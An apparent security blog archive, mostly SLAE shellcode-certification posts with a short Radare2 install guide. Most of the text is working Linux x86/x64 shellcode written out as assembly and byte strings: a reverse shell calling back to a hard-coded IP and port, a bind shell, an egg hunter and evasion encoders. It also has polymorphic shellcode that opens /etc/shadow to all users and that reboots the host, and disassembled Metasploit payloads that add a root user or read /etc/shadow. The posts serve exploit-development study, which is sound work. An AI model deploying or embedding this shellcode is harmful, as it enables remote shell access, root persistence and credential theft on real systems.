jueves, 7 de agosto de 2014

[HowTo] Install Radare2 with bindings

Original title was:  How to install Radare2 with bindings and not to die in the intent xD

I will not tell you what is R2, because if you read it, you know what is it. Is an awesome tool for RE.

I only will leave here some of pages related with this tool, so if you are interested in learn more about Radare2 you can do it in next pages:

Installation was do in Debian like system, in other arch you can use the same tricks I think ;)

$ git clone https://github.com/radare/radare2.git
$ cd radare2
$ ./sys/install.sh

$ sudo apt-get update  
$ sudo apt-get install -y software-properties-common python-all-dev wget build-essential autogen autoconf 
$ sudo apt-get install -y swig flex bison git gcc g++ make pkg-config 
$ sudo apt-get install -y  gobject-introspection python-gobject-dev glib-2.0 libglib2.0-dev node-gyp
Compile vala
wget http://download.gnome.org/sources/vala/0.24/vala-0.24.0.tar.xz; tar -Jxf vala-0.24.0.tar.xz 

vala-0.24.0; ./configure --prefix=/usr ; make && sudo make install ; cd ..

git clone git://git.gnome.org/vala && cd vala && sh autogen.sh --prefix=/usr && make && sudo make install; cd ..
Compile ctypes
cd radare2-bindings/ctypes; make; cd ..
Installing valabind, not install it with apt-get, because you will get old version, you can check version of package using apt-cache show valabind, if is < 0.8 download it from official repo.

Debian package can be found here

Ubuntu package can be found here

cd radare2; ./sys/all.sh; cd ..
Installing bindings First, get your python dist-package dir, for this you can do the next:
Fast way to get install dir is using command
locate dist-packages

or
cd radare2-bindigs; vim Makefile 
after install-ctypes(in current github version is line 164) is add: echo ${PYTHON_INSTALL_DIR}

In my case is /usr/lib/python2.7/dist-packages/r2
Now change user to root and copy the libs to python install dir
sudo su

If your path is different, you will need adjust all path in next block
mkdir -p /usr/lib/python2.7/dist-packages/r2

echo "Installing python2.7 r2 modules in /usr/lib/python2.7/dist-packages/" ; mkdir -p /usr/lib/python2.7/dist-packages/r2 ; : > /usr/lib/python2.7/dist-packages/r2/__init__.py ; cp -rf ctypes/r_*.py /usr/lib/python2.7/dist-packages/r2/; exit
Cleaning
 
apt-get clean && rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*
Sources:
radare.today
Radare and Radare bindings README.md files

Special thanks to @pancake :)

martes, 27 de mayo de 2014

[SLAEx64] IV Encoder/Decoder

Source: SecurityTube

How encoder work:

Get random number between 1-3 (link to python encoder script)
After add control number to shellcode, add junk bytes
Example:
-------------------------------------------------------------------------
| G | C | J | J | G | C | J | J | J | G |
-------------------------------------------------------------------------

G - good byte, shellcode byte
C - control number, help us control junk bytes to escape
J - Junk bytes

#!/usr/bin/python
from random import randint
#30 bytes
#shellcode - execve stack version
def get_random(ident):
    
    if ident == 'number':
        return randint(1,3)
    
    elif ident == 'char':
        return randint(65,122)#only [a-z[]\^_`A-Z]

shellcode  = ("\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
encoded = ""
#end     = "\\xf0\\x0d"

for x in bytearray(shellcode):
    
    encoded += '\\x%02x' % x
    
    random = get_random('number')
    encoded += '\\x%02x' % random
    
    for i in range(random-1):
        
        encoded += '\\x%02x' % get_random('char')

#encoded += end #probably we will need it for correct jump

print encoded
print 
print encoded.replace("\\x", ",0x")[1:]

print 'Initial len: %d, encoded len: %d' % (len(shellcode), 
    len(encoded)/4)

Decoder.nasm

section .text
global _start
_start:
        jmp short end ; jmp pop call
 
decoder:
 
        ; clean up the registers           

        pop rsi         ; get addr of shellcode putted by call starter
        push rsi        ; backup for call :D
 
        mov rdx, rsi    ; mov shellcode start addr to esi (source)
        mov rdi, rsi    ; mov shellcode start addr to edi (destination)
        inc rsi         ; point to the first dest byte, how many bytes we need to remove/espace
        inc rdi         ; point to the first random number
        
        push byte 0x53
        pop rcx ;83 - loop counter/your shellcode length, if you use diferent shellcode need adjust it
 
restore:
        xor rax, rax ;eax
        xor rbx, rbx ;ebx
 
        mov al, byte [rdi]  ; read distance to next byte
        add rax, rdi        ; eax = addr of the next valid byte
 
        mov bl, byte [rax]  ; bl = next valid byte of the shellcode
        mov byte [rdx], bl  ; move it to the final position
 
        mov rdi, rax        ; put latest valid pisition into edi 
        inc rdi             ; next distance
        inc rdx             ; next valid byte
 
        loop restore        ; loop
        
        pop rsi             ; call shellcode
        call rsi                       
 
end:
        call decoder  ; put shellcode addr into stack
        shelcode: db  0x48,0x01,0x31,0x01,0xc0,0x01,0x50,0x03,0x69,0x5b,0x48,0x01,0xbb,0x03,0x7a,0x4d,0x2f,0x03,0x60,0x49,0x62,0x01,0x69,0x01,0x6e,0x01,0x2f,0x02,0x58,0x2f,0x02,0x76,0x73,0x02,0x7a,0x68,0x01,0x53,0x03,0x71,0x62,0x48,0x01,0x89,0x02,0x7a,0xe7,0x01,0x50,0x03,0x6d,0x51,0x48,0x02,0x42,0x89,0x01,0xe2,0x02,0x51,0x57,0x03,0x71,0x59,0x48,0x02,0x54,0x89,0x01,0xe6,0x03,0x46,0x6c,0xb0,0x03,0x4b,0x61,0x3b,0x01,0x0f,0x02,0x71,0x05,0x01
SLAE64 - 1322

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

SecurityTube Linux Assembly Expert x64

lunes, 26 de mayo de 2014

[SLAEx64] III EggHunter

Source: SecurityTube

x32 bits EggHunter can be found here

;SLAE-1322 Andriy Brukhovetskyy
;egg hunting explained some techniques  
;http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
;43 bytes

global _start
section .text
_start:

    xor rcx, rcx    ; 0
        
get_memory_block:
    ;getconf PAGE_SIZE in x64 is the same
    or dx, 0xfff    ; is the same as "add dx, 4095" (PAGE_SIZE)
        
checker:

    inc rdx         ; next memory offset
    push byte +0x15 ; __NR_access 21
    pop rax

    lea rbx, [rdx+8] ; alignment to validate the last four bytes of the signature
                     ; rcx already contains 0 (F_OK)
    syscall          ; syscall
    ;grep EFAULT /usr/include/asm-generic/errno-base.h
    ;bad address = EFAULT = 0xf2 = -14
    cmp al, 0xf2; because it's not a file

    jz get_memory_block ; if is not, loop

    mov rax, 0x5090509050905090 ; egg here in little endiant
    mov rdi, rdx
    
    scasq
    jnz checker ; return and search

    jmp rdi; if we here == we found the eggs, jump to our shellcode :)
SLAE64 - 1322

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

SecurityTube Linux Assembly Expert x64

domingo, 25 de mayo de 2014

[SLAEx64] II tcp_reverse_shell with passcode

Source: SecurityTube

This is x64 bits tcp reverse shell with passcode, if you need more explications, please check my post about x32 bits reverse shell, where you can found man about *nix socket programing

shell asm source

; Author Andriy Brukhovetskyy - doomedraven - SLAEx64 - 1322
; 138 bytes
global _start
section .text
_start:

    ;socket syscall
    push byte 0x29 ; 41 socket 
    pop rax    
    push byte 0x2 ; AF_INET
    pop rdi  
    push byte 0x1 ; SOCK_STREAM
    pop rsi    
    cdq ;rdx = 0 - ANY
    syscall
    
    xchg rdi, rax ; save socket descriptor
    
    mov dword [rsp-4], 0x0901a8c0 ; ip
    mov word [rsp-6], 0x5c11      ; port 4444
    mov byte [rsp-8], 0x02
    sub rsp, 8
    
    push byte 0x2a ; connect
    pop rax
    mov rsi, rsp   ; pointer    
    push byte 0x10 ; len
    pop rdx
    syscall

    push byte 0x3; counter 
    pop rsi

dup2_loop:
    dec rsi
    push byte 0x21
    pop rax
    syscall
    jnz dup2_loop ; jump if not 0

    ;read buffer
    mov rdi, rax ; socket
    cdq
    mov byte [rsp-1], al ;0 read
    sub rsp, 1
          
    push rdx 
    lea rsi, [rsp-0x10] ; 16 bytes from buf
    add dl, 0x10        ; size_t count
    syscall
    
    ;test passcode
    mov rax, 0x617264656d6f6f64 ; passcode 'doomedra'[::-1].encode('hex')
    push rdi                    ; save the socket
    lea rdi, [rsi]              ; load string from address
    scasq                       ; compare
    jz accepted_passwd          ; jump if equal
    
    ;exit if different :P
    push byte 0x3c 
    pop rax
    syscall

accepted_passwd:
    
    ;execve
    pop rdi; socket
    xor rax, rax
    mov rbx, 0x68732f2f6e69622f ;/bin//sh in reverse
    push rbx
    mov rdi, rsp
    push rax
    mov rdx, rsp
    push rdi 
    mov rsi, rsp
    add al, 0x3b
    syscall

C output

// 138 bytes 
unsigned char code[] =\
"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05"
"\x48\x97\xc7\x44\x24\xfc"
"\xc0\xa8\x01\x09" //ip big endiant
"\x66\xc7\x44\x24\xfa"
"\x11\x5c" //port big endiant
"\xc6\x44\x24\xf8\x02\x48\x83"
"\xec\x08\x6a\x2a\x58\x48\x89\xe6\x6a\x10\x5a\x0f"
"\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05"
"\x75\xf6\x48\x89\xc7\x99\x88\x44\x24\xff\x48\x83"
"\xec\x01\x52\x48\x8d\x74\x24\xf0\x80\xc2\x10\x0f"
"\x05\x48\xb8\x64\x6f\x6f\x6d\x65\x64\x72\x61\x57"
"\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05"
"\x5f\x48\x31\xc0\x48\xbb\x2f\x62\x69\x6e\x2f\x2f"
"\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48"
"\x89\xe6\x04\x3b\x0f\x05";

Examples:

Correct passwd


Incorrect passwd


This shellcode was accepted to shell-storm.org and can be found here, special thank to @JonathanSalwan for accept it :)

SLAE64 - 1322

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

SecurityTube Linux Assembly Expert x64

sábado, 24 de mayo de 2014

[SLAEx64] tcp_bind_shell with passcode

Source: SecurityTube

This is x64 bits tcp bind shell with passcode, if you need more explications, please check my post about x32 bits bind shell, where you can found man about *nix socket programing

shell asm source

;Author - Andriy Brukhovetskyy - doomedraven - SLAEx64 - 1322
;175 bytes

global _start
section .text
_start:
    push byte 0x29 ; 41 - socket syscall 
    pop rax
    push byte 0x02 ; AF_INET
    pop rdi 
    push byte 0x01 ; SOCK_STREAM
    pop rsi
    cdq
    syscall
    
    ;copy socket descriptor to rdi for future use
    ;bind
    xchg rdi, rax
    xor rax, rax
    mov dword [rsp-4], eax    ;INADDR_ANY
    mov word  [rsp-6], 0x5c11 ;PORT 4444
    mov byte  [rsp-8], 0x2    ;AF_INET
    sub rsp, 0x8
    
    push byte 0x31 ;49 bind
    pop rax 
    mov rsi, rsp
    cdq
    add dl, 16 ;len
    syscall
    
    ;listen
    push byte 0x32 ;listen
    pop rax
    ;push byte 0x02 ;max clients
    ;pop rsi
    syscall
     
    push byte 0x2b ; accept
    pop rax
    sub rsp, 0x10  ; adjust
    xor rsi, rsi    
    mov rsi, rsp ; pointer
    mov byte [rsp-1], 0x10 ;len
    sub rsp, 0x01   ; adjust
    cdq
    mov rdx, rsp ; pointer
    syscall
        
    ;read buffer
    mov rdi, rax ; socket
    xor rax, rax
    mov byte [rsp-1], al ;0 read
    sub rsp, 1
    cdq      
    push rdx ; 0 stdin
    lea rsi, [rsp-0x10] ; 16 bytes from buffer
    add dl, 0x10        ; len
    syscall
    
    ;test passcode
    mov rax, 0x617264656d6f6f64 ; passcode 'doomedra'[::-1].encode('hex')
    push rdi                    ; save the socket
    lea rdi, [rsi]              ; load string from address
    scasq                       ; compare
    jz accepted_passwd          ; jump if equal
    
    ;exit if different :P
    xor rax, rax 
    add al, 60
    syscall

accepted_passwd:

    pop rdi; socket
    push byte 0x03
    pop rsi

dup2_loop:
    dec rsi
    push byte 0x21
    pop rax
    syscall
    jnz dup2_loop ; jump if not 0

    push rsi; 0
    
    ;execve
    ;push /bin//sh in reverse
    mov rbx, 0x68732f2f6e69622f
    push rbx
    
    mov rdi, rsp
    push rsi
    
    mov rdx, rsp
    push rdi 
    
    mov rsi, rsp
    push byte 0x3b
    pop rax
    syscall

C output

unsigned char code[] =\
"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05\x48\x97\x48\x31\xc0\x89\x44\x24\xfc\x66\xc7\x44\x24\xfa\x11\x5c\xc6\x44\x24\xf8\x02\x48\x83\xec\x08\x6a\x31\x58\x48\x89\xe6\x99\x80\xc2\x10\x0f\x05\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x48\x83\xec\x10\x48\x31\xf6\x48\x89\xe6\xc6\x44\x24\xff\x10\x48\x83\xec\x01\x99\x48\x89\xe2\x0f\x05\x48\x89\xc7\x48\x31\xc0\x88\x44\x24\xff\x48\x83\xec\x01\x99\x52\x48\x8d\x74\x24\xf0\x80\xc2\x10\x0f\x05\x48\xb8\x64\x6f\x6f\x6d\x65\x64\x72\x61\x57\x48\x8d\x3e\x48\xaf\x74\x07\x48\x31\xc0\x04\x3c\x0f\x05\x5f\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x56\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x56\x48\x89\xe2\x57\x48\x89\xe6\x6a\x3b\x58\x0f\x05";


Examples:

Correct passwd


Incorrect passwd


This shellcode was accepted to shell-storm.org and can be found here, special thank to @JonathanSalwan for accept it :)


SLAE64 - 1322

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

SecurityTube Linux Assembly Expert x64

martes, 13 de mayo de 2014

[SLAE] VI - Polymorphic

Source: SecurityTube

I recommend check this article Polymorphic Shellcode Engine Using Spectrum Analysis


;26 bytes
;Shellcode : linux/x86 File unlinker 18 bytes + file path length
global _start
section .text
_start:

    jmp one

two
    pop ebx
    ;mov al, 0xa ;[ORIGIN]
    mov al, 0x7  ;[NEW]
    add al,  0x5 ;[NEW]
    sub al,  0x2 ;[NEW]
    int 0x80

    mov al, 01
    xor ebx, ebx
    int 0x80

one:
    call two
    file: db 0xaa, 0xbb, 0xcc, 0xdd; <- your file here
Original here

;46 bytes
;Shellcode Linux x86 PUSH reboot()
global _start
section .text
_start:

    xor eax, eax
    push eax
    
    ;push 0x746f6f62; toob [ORIGINAL]
    mov esi, 0x746f6c59   ; [NEW]
    add si,  0x309        ; [NEW]
    mov dword [esp-4], esi; [NEW]
    sub esp, 4            ; [NEW]
    push 0x65722f6e  ; er/n [ORIGINAL]
    
    push 0x6962732f; ibs/[ORIGINAL]

    mov ebx, esp
    push eax; 0

    mov edx, esp
    push ebx

    mov ecx, esp
    mov al, 0xb; [ORIGINAL]
    mov al, 0x6; [NEW]
    add al, 0x5; [NEW] 11 = NR_execve

    int 0x80     
Original here

;Linux/x86 - chmod() 666 /etc/shadow & exit()

;39 bytes shellcode
global _start
section .text
_start:

    push ecx
    mov cx, 0x1b6; = 438
    ;push 0x776f6461; woda [ORIGINAL]
    mov esi, 0x776f6158;   [NEW]
    add si, 0x309 ;  woda  [NEW]
    mov dword [esp-4], esi;[NEW]
    push 0x68732f63; hs/c
    push 0x74652f2f; te//
    mov ebx, esp ;save pointer
    push 0xf     ;chmod
    pop eax      ;15
    int 0x80
    inc eax ;exit
    int 0x80
Original here

SLAE-513

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:


sábado, 10 de mayo de 2014

[SLAE] V-3 Analyzing Metasploit linux/x86/shell_bind_tcp_random_port payload

Source: SecurityTube


I explain every line witch need explication, I hope it's explained enough, if you don't understand something, leave me a commend and I will explain/respond to all questions.

1) We need generate our payload for post analysis
msfpayload linux/x86/shell_bind_tcp_random_port C
/*
 * linux/x86/shell_bind_tcp_random_port - 57 bytes
 * http://www.metasploit.com
 * VERBOSE=false, PrependFork=false, PrependSetresuid=false, 
 * PrependSetreuid=false, PrependSetuid=false, 
 * PrependSetresgid=false, PrependSetregid=false, 
 * PrependSetgid=false, PrependChrootBreak=false, 
 * AppendExit=false
 */
unsigned char payload[] = 
"\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a\x02\x89\xe1\xcd\x80"
"\x52\x50\x89\xe1\xb0\x66\xb3\x04\xcd\x80\xb0\x66\x43\xcd\x80"
"\x59\x93\x6a\x3f\x58\xcd\x80\x49\x79\xf8\xb0\x0b\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\xcd\x80";

compilation - gcc -ggdb -z execstack -fno-stack-protector shellcode.c -o shellcode
Source of .C code can be found here
For start I recommend to you check this my post about Bind shell
2) Analyzing with GDB

gdb -q ./shellcode

=> 0x0804a040 <+0>:        xor    ebx,ebx ; 0
   0x0804a042 <+2>:        mul    ebx     ; 0
   0x0804a044 <+4>:        mov    al,0x66 ; 102 == socketcall 
   0x0804a046 <+6>:        inc    ebx     ; 1   == sys_socket  -> int socket (int family, int type, int protocol);
   0x0804a047 <+7>:        push   edx     ; 0 == system default(tcp/upd) - int protocol
   0x0804a048 <+8>:        push   ebx     ; 1 == SOCK_STREAM 
   0x0804a049 <+9>:        push   0x2     ; 2 == AF_INET - int family
   0x0804a04b <+11>:       mov    ecx,esp ; save pointer to args
   0x0804a04d <+13>:       int    0x80    ; syscall
   0x0804a04f <+15>:       push   edx     ; 0
   0x0804a050 <+16>:       push   eax     ; 7
   0x0804a051 <+17>:       mov    ecx,esp ; save pointer
   0x0804a053 <+19>:       mov    al,0x66 ; 102 == socketcall
   0x0804a055 <+21>:       mov    bl,0x4  ; 4   == sys_listen
   0x0804a057 <+23>:       int    0x80    ; syscall
   0x0804a059 <+25>:       mov    al,0x66 ; 102 == socketcall
   0x0804a05b <+27>:       inc    ebx     ; 5   == sys_accept as we no pass port, it well be random check man accept for more information
   0x0804a05c <+28>:       int    0x80    ; syscall
   0x0804a05e <+30>:       pop    ecx     ; 7
   0x0804a05f <+31>:       xchg   ebx,eax ; ebx = 8, eax = 5
   0x0804a060 <+32>:       push   0x3f    ; 63
   0x0804a062 <+34>:       pop    eax     ; eax = 63 = dup2 redirrect STDIN/STDOUT/STDERR here they
                                                         do this bucle 8 times from 7 to 0
   0x0804a063 <+35>:       int    0x80       ; syscall
   0x0804a065 <+37>:       dec    ecx        ; ecx -1
   0x0804a066 <+38>:       jns    0x804a060  if ecx > 0 jump to <+32>
   0x0804a068 <+40>:       mov    al,0xb     ; 11 == execve
   0x0804a06a <+42>:       push   0x68732f2f ; hs//
   0x0804a06f <+47>:       push   0x6e69622f ; nib/ <- /bin/sh start
   0x0804a074 <+52>:       mov    ebx,esp    ; save pointer to /bin/bash
   0x0804a076 <+54>:       inc    ecx        ; 0
   0x0804a077 <+55>:       int    0x80       ; syscall
   0x0804a079 <+57>:       add    BYTE PTR [eax],al

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

SLAE-513

[SLAE] V-2 Analyzing Metasploit linux/x86/adduser payload

Source: SecurityTube


I explain every line witch need explication, I hope it's explained enough, if you don't understand something, leave me a commend and I will explain/respond to all questions.

1) We need generate our payload for post analysis
msfpayload linux/x86/adduser USER=doomedraven PASS=rulez C
/*
 * linux/x86/adduser - 98 bytes
 * http://www.metasploit.com
 * VERBOSE=false, PrependFork=false, PrependSetresuid=false, 
 * PrependSetreuid=false, PrependSetuid=false, 
 * PrependSetresgid=false, PrependSetregid=false, 
 * PrependSetgid=false, PrependChrootBreak=false, 
 * AppendExit=false, USER=doomedraven, PASS=rulez, 
 * SHELL=/bin/sh
 */
unsigned char payload[] =\
"\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x6a\x05\x58\x31\xc9\x51"
"\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63"
"\x89\xe3\x41\xb5\x04\xcd\x80\x93\xe8\x29\x00\x00\x00\x64\x6f"
"\x6f\x6d\x65\x64\x72\x61\x76\x65\x6e\x3a\x41\x7a\x56\x73\x58"
"\x48\x68\x50\x44\x73\x74\x56\x51\x3a\x30\x3a\x30\x3a\x3a\x2f"
"\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x0a\x59\x8b\x51\xfc\x6a\x04"
"\x58\xcd\x80\x6a\x01\x58\xcd\x80";

compilation - gcc -ggdb -z execstack -fno-stack-protector shellcode.c -o shellcode
source of .C code can be found here

2) Analyzing with GDB

gdb -q ./shellcode

(gdb) disassemble 
Dump of assembler code for function payload:
=> 0x0804a040 <+0>:        xor    ecx,ecx; 0
   0x0804a042 <+2>:        mov    ebx,ecx; 0
   0x0804a044 <+4>:        push   0x46   ; 70 = __NR_setreuid -> man setreuid
   0x0804a046 <+6>:        pop    eax    ; get 70 
   0x0804a047 <+7>:        int    0x80   ; syscall return -1 = error
   0x0804a049 <+9>:        push   0x5    ; 5
   0x0804a04b <+11>:       pop    eax    ; eax = 0x5 = __NR_open -> man 2 setreuid
   0x0804a04c <+12>:       xor    ecx,ecx; exc = 0
   0x0804a04e <+14>:       push   ecx    ; 0
   0x0804a04f <+15>:       push   0x64777373 ; dwss
   0x0804a054 <+20>:       push   0x61702f2f ; ap// <- 2 / becouse is not importand here and we need 4 byte
   0x0804a059 <+25>:       push   0x6374652f ; cte/ <- start of /etc/passwd
   0x0804a05e <+30>:       mov    ebx,esp    ; save pointer to /etc/passwd
   0x0804a060 <+32>:       inc    ecx        ; 1 == O_WRONLY <- /usr/include/asm-generic/fcntl.h
   0x0804a061 <+33>:       mov    ch,0x4     ; 0x401 == 1025 = xor 02000,01 == O_APPEND <- /usr/include/asm-generic/fcntl.h
   0x0804a063 <+35>:       int    0x80       ; syscall return -13
   0x0804a065 <+37>:       xchg   ebx,eax    ; save syscall response into ebx
   0x0804a066 <+38>:       call   0x804a094 
   0x0804a06b <+43>:       outs   dx,DWORD PTR fs:[esi]
   0x0804a06d <+45>:       outs   dx,DWORD PTR ds:[esi]
   0x0804a06e <+46>:       ins    DWORD PTR es:[edi],dx
   0x0804a06f <+47>:       gs
   0x0804a070 <+48>:       fs
   0x0804a071 <+49>:       jb     0x804a0d4
   0x0804a073 <+51>:       jbe    0x804a0da
   0x0804a075 <+53>:       outs   dx,BYTE PTR ds:[esi]
   0x0804a076 <+54>:       cmp    al,BYTE PTR [ecx+0x7a]
   0x0804a079 <+57>:       push   esi
   0x0804a07a <+58>:       jae    0x804a0d4
   0x0804a07c <+60>:       dec    eax
   0x0804a07d <+61>:       push   0x74734450
   0x0804a082 <+66>:       push   esi
   0x0804a083 <+67>:       push   ecx
   0x0804a084 <+68>:       cmp    dh,BYTE PTR [eax]
   0x0804a086 <+70>:       cmp    dh,BYTE PTR [eax]
   0x0804a088 <+72>:       cmp    bh,BYTE PTR [edx]
   0x0804a08a <+74>:       das    
   0x0804a08b <+75>:       cmp    ch,BYTE PTR [edi]
   0x0804a08d <+77>:       bound  ebp,QWORD PTR [ecx+0x6e]
   0x0804a090 <+80>:       das    
   0x0804a091 <+81>:       jae    0x804a0fb
   0x0804a093 <+83>:       or     bl,BYTE PTR [ecx-0x75]
   0x0804a096 <+86>:       push   ecx
   0x0804a097 <+87>:       cld    
   0x0804a098 <+88>:       push   0x4 
   0x0804a09a <+90>:       pop    eax  ; 4  == __NR_write == write(int fd, const void *buf, size_t count);
   0x0804a09b <+91>:       int    0x80 ; syscall 
   0x0804a09d <+93>:       push   0x1   
   0x0804a09f <+95>:       pop    eax  ; 1 exit
   0x0804a0a0 <+96>:       int    0x80 ; syscall
   0x0804a0a2 <+98>:       add    BYTE PTR [eax],al
End of assembler dump.

3) Looking with Ndisasm

User:doomedraven
Passwd: import crypt; crypt.crypt('rules', 'Az');'Azble21jpm/n6'

msfpayload -p linux/x86/adduser user=doomedraven pass=rules R | ndisasm -
->removed 
00000029  0000              add [bx+si],al;0
0000002B  646F              fs outsw      ;do <- start username
0000002D  6F                outsw         ;o
0000002E  6D                insw          ;m
0000002F  65647261          fs jc 0x94    ;edra
00000033  7665              jna 0x9a      ;ve
00000035  6E                outsb         ;n
00000036  3A417A            cmp al,[bx+di+0x7a];:Az  <- start passwd
00000039  626C65            bound bp,[si+0x65] ;ble
0000003C  3231              xor dh,[bx+di]     ;21
0000003E  6A70              push byte +0x70    ;jp
00000040  6D                insw               ;m
00000041  2F                das                ;/
00000042  6E                outsb              ;n
00000043  363A30            cmp dh,[ss:bx+si]  ;6:0 <- passwd end and id
00000046  3A30              cmp dh,[bx+si]     ;:0
00000048  3A3A              cmp bh,[bp+si]     ;::
0000004A  2F                das                ;/
0000004B  3A2F              cmp ch,[bx]        ;:/
0000004D  62696E            bound bp,[bx+di+0x6e];bin
00000050  2F                das                  ;/
00000051  7368              jnc 0xbb             ;sh
00000053  0A598B            or bl,[bx+di-0x75]   ;
->removed

SLAE-513

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:


viernes, 9 de mayo de 2014

[SLAE] V-1 Analyzing Metasploit linux/x86/exec payload

Source: SecurityTube


I explain every line witch need explication, I hope it's explained enough, if you don't understand something, leave me a commend and I will explain/respond to all questions.

1) We need generate our payload for post analysis
msfpayload linux/x86/exec CMD='cat /etc/shadow' C
/*
 * linux/x86/exec - 51 bytes
 * http://www.metasploit.com
 * VERBOSE=false, PrependFork=false, PrependSetresuid=false, 
 * PrependSetreuid=false, PrependSetuid=false, 
 * PrependSetresgid=false, PrependSetregid=false, 
 * PrependSetgid=false, PrependChrootBreak=false, 
 * AppendExit=false, CMD=cat /etc/shadow
 */
unsigned char buf[] = 
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x10\x00\x00\x00\x63"
"\x61\x74\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77\x00"
"\x57\x53\x89\xe1\xcd\x80";

compilation - gcc -ggdb -z execstack -fno-stack-protector shellcode.c -o shellcode
source of .C code can be found here: https://github.com/doomedraven/SLAE/tree/master/SLAEx32/Assignment%205

2) Analyzing with GDB

gdb -q ./shellcode

=> 0x0804a040 <+0>:        push   0xb    ; 11 -> __NR_execve
   0x0804a042 <+2>:        pop    eax
   0x0804a043 <+3>:        cdq           ; convert double to quad
   0x0804a044 <+4>:        push   edx    ; 0
   0x0804a045 <+5>:        pushw  0x632d ; .decode('hex') -> '-c'
   0x0804a049 <+9>:        mov    edi,esp; save pointer to -c 
   0x0804a04b <+11>:       push   0x68732f  ; hs/
   0x0804a050 <+16>:       push   0x6e69622f; nib/
   0x0804a055 <+21>:       mov    ebx,esp   ; save pointer to /bin/bash
   0x0804a057 <+23>:       push   edx
   0x0804a058 <+24>:       call   0x804a06d ; jump to 0x0804a06d <+45>
   0x0804a05d <+29>:       arpl   WORD PTR [ecx+0x74],sp 
   0x0804a060 <+32>:       and    BYTE PTR [edi],ch       
   0x0804a062 <+34>:       gs                             
   0x0804a063 <+35>:       je     0x804a0c8
   0x0804a065 <+37>:       das    
   0x0804a066 <+38>:       jae    0x804a0d0
   0x0804a068 <+40>:       popa   
   0x0804a069 <+41>:       outs   dx,DWORD PTR fs:[esi]
   0x0804a06b <+43>:       ja     0x804a06d 
   0x0804a06d <+45>:       push   edi     ; jump here and push pointer to -c
   0x0804a06e <+46>:       push   ebx     ; push point to start of  /bin
   0x0804a06f <+47>:       mov    ecx,esp ; save pointer
   0x0804a071 <+49>:       int    0x80    ; syscall
   0x0804a073 <+51>:       add    BYTE PTR [eax],al
End of assembler dump.

3) Looking with Ndisasm

msfpayload -p linux/x86/exec cmd='cat /etc/shadow' R | ndisasm -
-> removed
00000018  E81000            call word 0x2b
0000001B  0000              add [bx+si],al
0000001D  636174            arpl [bx+di+0x74],sp ;cat
00000020  202F              and [bx],ch          ; /
00000022  657463            gs jz 0x88           ;etc
00000025  2F                das                  ;/
00000026  7368              jnc 0x90             ;sh
00000028  61                popaw                ;a
00000029  646F              fs outsw             ;do
0000002B  7700              ja 0x2d              ;w0
-> removed

4) Generating .dot graph with Libemu

SLAE-513

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:


martes, 6 de mayo de 2014

[SLAE] IV Simple Encoder/decoder

Source: SecurityTube

Ok, here I will show simple Enconder/decoder, source code can be found in github.
How encoder work:

  1. Get random number between 1-3 (link to python encoder script)
  2. After add control number to shellcode, add junk bytes
Example:
------------------------------------------------------------------
|  G   |  C   |   J   |   J   |  G   |   C  |  J   |  J   |   J   |   G |
------------------------------------------------------------------

G - good byte, shellcode byte
C - control number, help us control junk bytes to escape
J - Junk bytes

#!/usr/bin/python
from random import randint
#30 bytes
#shellcode - execve stack version
def get_random(ident):
    
    if ident == 'number':
        return randint(1,3)
    
    elif ident == 'char':
        return randint(65,122)#only [a-z[]\^_`A-Z]

shellcode  = ("\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
encoded = ""
#end     = "\\xf0\\x0d"

for x in bytearray(shellcode):
    
    encoded += '\\x%02x' % x
    
    random = get_random('number')
    encoded += '\\x%02x' % random
    
    for i in range(random-1):
        
        encoded += '\\x%02x' % get_random('char')

#encoded += end #probably we will need it for correct jump

print encoded
print 
print encoded.replace("\\x", ",0x")[1:]

print 'Initial len: %d, encoded len: %d' % (len(shellcode), 
    len(encoded)/4)

Decoder.nasm
section .text
global _start
_start:
        jmp short end ; jmp pop call
 
decoder:
 
        xor eax, eax    ; clean up the registers
        xor ebx, ebx
        xor edx, edx
        xor ecx, ecx
 
        pop edx         ; get addr of shellcode putted by call starter
        push edx        ; backup for call :D
 
        mov esi, edx    ; mov shellcode start addr to esi (source)
        mov edi, edx    ; mov shellcode start addr to edi (destination)
        inc esi         ; point to the first dest byte, how many bytes we need to remove/espace
        inc edi         ; point to the first random number
        
        mov cl, 89      ; loop counter/your shellcode length, if you use diferent shellcode need adjust it
 
restore: ;decode
        xor eax, eax
        xor ebx, ebx
 
        mov al, byte [edi]  ; read distance to next byte
        add eax, edi        ; eax = addr of the next valid byte
 
